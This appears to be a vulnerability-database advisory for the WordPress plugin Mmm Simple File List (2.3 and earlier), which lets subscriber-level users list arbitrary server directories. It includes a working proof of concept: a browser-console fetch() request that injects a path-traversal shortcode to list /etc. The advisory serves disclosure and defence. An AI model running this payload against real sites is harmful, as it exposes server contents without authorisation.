Lucene search

K
wpvulndbDmitriiWPVDB-ID:9FF85B06-819C-459E-90A9-6151BFD70978
HistoryNov 06, 2023 - 12:00 a.m.

Mmm Simple File List <= 2.3 - Subscriber+ Arbitrary Directory Listing

2023-11-0600:00:00
Dmitrii
wpscan.com
2
plugin vulnerability
directory listing
arbitrary access

6 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

14.2%

Description The plugin does not validate the generated path to list files from, allowing any authenticated users, such as subscribers, to list the content of arbitrary directories.

PoC

Run the below command in the developer console of the web browser while being on the blog as a subscriber user fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: ‘action=parse-media-shortcode&shortcode;=[MMFileList folder=“…/…/…/…/…/…/…/…/…/…/etc” format=“table” types"" headings=“”]’, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data));

6 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

14.2%

Related for WPVDB-ID:9FF85B06-819C-459E-90A9-6151BFD70978